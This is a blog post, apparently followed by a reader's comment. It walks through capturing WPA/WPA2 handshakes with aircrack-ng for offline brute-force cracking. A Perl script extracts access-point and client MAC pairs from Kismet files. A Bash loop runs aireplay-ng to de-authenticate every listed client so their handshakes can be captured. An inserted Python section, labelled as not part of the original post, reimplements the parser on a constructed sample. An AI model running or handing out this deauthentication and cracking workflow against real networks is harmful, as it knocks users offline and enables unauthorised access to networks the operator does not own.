This post deals with gathering the information you need to use aircrack-ng to capture a WPA/WPA2 handshake for offline brute-force attacks. When running aireplay-ng to send out de-authentication packets you need the MAC address of the access point and of a client associated with it. The way I collected that information was to run Kismet. With the older version of Kismet I would watch the client panel view and select (copy/paste) the access point and client MACs. The new version of Kismet does not let you select a MAC address, so I wrote myself a quick Perl script that parses the Kismet NETXML file and prints the MAC addresses of each AP and its associated clients as pairs.
#!/usr/bin/perl
# Print "BSSID CLIENT-MAC" pairs for every infrastructure network in a Kismet
# NETXML file that advertises more than one <encryption> entry (WPA/WPA2).
use strict;
use warnings;
use XML::Simple;

die "usage: $0 <kismet.netxml>\n" unless @ARGV;

# ForceArray keeps <wireless-network> and <wireless-client> as lists even when
# the file holds only one of them; without it XML::Simple returns a plain hash
# and the loops below silently skip that network or client.
my $xs = XML::Simple->new(
    KeyAttr    => [],
    ForceArray => [ 'wireless-network', 'wireless-client' ],
);
my $data = $xs->XMLin( $ARGV[0] );

for my $wn ( @{ $data->{'wireless-network'} } ) {
    my $channel = $wn->{'channel'};
    my $bssid   = $wn->{'BSSID'};
    # Kismet writes one <encryption> element per cipher/auth flag, so a WPA/WPA2
    # network shows up as an array here while open/WEP networks carry a scalar.
    next unless ref( $wn->{'SSID'} ) eq 'HASH'
        && ref( $wn->{'SSID'}->{'encryption'} ) eq 'ARRAY'
        && $wn->{'type'} eq 'infrastructure';
    for my $wc ( @{ $wn->{'wireless-client'} || [] } ) {
        # Only clients seen sending to the AP ('tods') are associated with it.
        next unless $wc->{'type'} eq 'tods';
        print "$bssid $wc->{'client-mac'}\n";
    }
}
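The same NETXML walk in Python, as an added example that is not part of the original post: it pairs each infrastructure AP with the clients seen transmitting to it, makes the WPA/WPA2 test explicit instead of inferring it from the number of <encryption> elements, and handles a network with a single client the same way as one with many. The sample capture below is constructed, in the element layout the Perl script's keys imply (BSSID, channel, SSID/encryption/essid, wireless-client/client-mac), and is not real Kismet output.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the Kismet NETXML layout the post's Perl script expects
# (not a real capture): one WPA infrastructure network with three clients, one
# open network with a single client, and one probe entry with no SSID block.
SAMPLE_NETXML = """<detection-run kismet-version="2011.03.R2">
  <wireless-network number="1" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WPA+PSK</encryption>
      <encryption>WPA+TKIP</encryption>
      <encryption>WPA+AES-CCM</encryption>
      <essid cloaked="false">corp-wifi</essid>
    </SSID>
    <BSSID>00:11:22:33:44:55</BSSID>
    <channel>6</channel>
    <wireless-client number="1" type="tods">
      <client-mac>AA:BB:CC:00:00:01</client-mac>
    </wireless-client>
    <wireless-client number="2" type="fromds">
      <client-mac>AA:BB:CC:00:00:02</client-mac>
    </wireless-client>
    <wireless-client number="3" type="tods">
      <client-mac>AA:BB:CC:00:00:03</client-mac>
    </wireless-client>
  </wireless-network>
  <wireless-network number="2" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>None</encryption>
      <essid cloaked="false">guest-open</essid>
    </SSID>
    <BSSID>66:77:88:99:AA:BB</BSSID>
    <channel>11</channel>
    <wireless-client number="1" type="tods">
      <client-mac>AA:BB:CC:00:00:04</client-mac>
    </wireless-client>
  </wireless-network>
  <wireless-network number="3" type="probe">
    <BSSID>CC:DD:EE:00:00:05</BSSID>
    <channel>0</channel>
  </wireless-network>
</detection-run>
"""


def ap_client_pairs(netxml_text, wpa_only=True):
    """Return (bssid, client_mac, channel, essid) tuples for every client seen
    sending to the AP ('tods') on an infrastructure network.

    With wpa_only=True only networks advertising a WPA* encryption flag are
    kept; the post's Perl script approximates the same selection by checking
    for more than one <encryption> element.
    """
    root = ET.fromstring(netxml_text)
    pairs = []
    for net in root.iter("wireless-network"):
        if net.get("type") != "infrastructure":
            continue
        bssid = net.findtext("BSSID", default="")
        channel = net.findtext("channel", default="")
        ssid = net.find("SSID")
        essid = ssid.findtext("essid", default="") if ssid is not None else ""
        encs = [e.text or "" for e in ssid.iter("encryption")] if ssid is not None else []
        if wpa_only and not any(e.startswith("WPA") for e in encs):
            continue
        # findall returns direct children as a list, so a network with one
        # <wireless-client> is handled exactly like one with many.
        for client in net.findall("wireless-client"):
            if client.get("type") != "tods":
                continue
            mac = client.findtext("client-mac", default="")
            pairs.append((bssid, mac, channel, essid))
    return pairs


if __name__ == "__main__":
    import sys
    # Read the NETXML path from the command line, or fall back to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NETXML
    for bssid, mac, channel, essid in ap_client_pairs(text):
        print(f"{bssid} {mac}  ch={channel} essid={essid}")
```

Run it with a .netxml path as the only argument; without one it prints the pairs from the constructed sample. Passing wpa_only=False lists every infrastructure association regardless of encryption, which is the more useful form when the goal is simply an inventory of which clients are talking to which APs.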
I then feed the file that script produces to a simple Bash script that uses aireplay-ng to knock all the listed clients offline. Of course you have airodump-ng listening for the WPA/WPA2 handshakes at the same time.
#!/bin/bash
# Usage: $0 <monitor-interface> <pairs-file>
# Reads "BSSID CLIENT-MAC" lines produced by the Perl script above and runs
# one aireplay-ng de-authentication round per pair.
set -x
[ $# -eq 2 ] || { echo "usage: $0 <monitor-interface> <pairs-file>" >&2; exit 1; }
AIREPLAY=/usr/local/sbin/aireplay-ng
WIFACE=$1
FILE=$2
while read -r bssid clientmac
do
    echo "$bssid $clientmac"
    "$AIREPLAY" -0 1 -a "$bssid" -c "$clientmac" --ignore-negative-one "$WIFACE"
done < "$FILE"
Hi, I'm trying to get your Perl code running, but it won't, and either I'm too blind to see why it won't, or too stupid..
You wrote this 2 years ago? I don't think so much has changed since then, so I'm probably just stupid..
Best regards
Mikey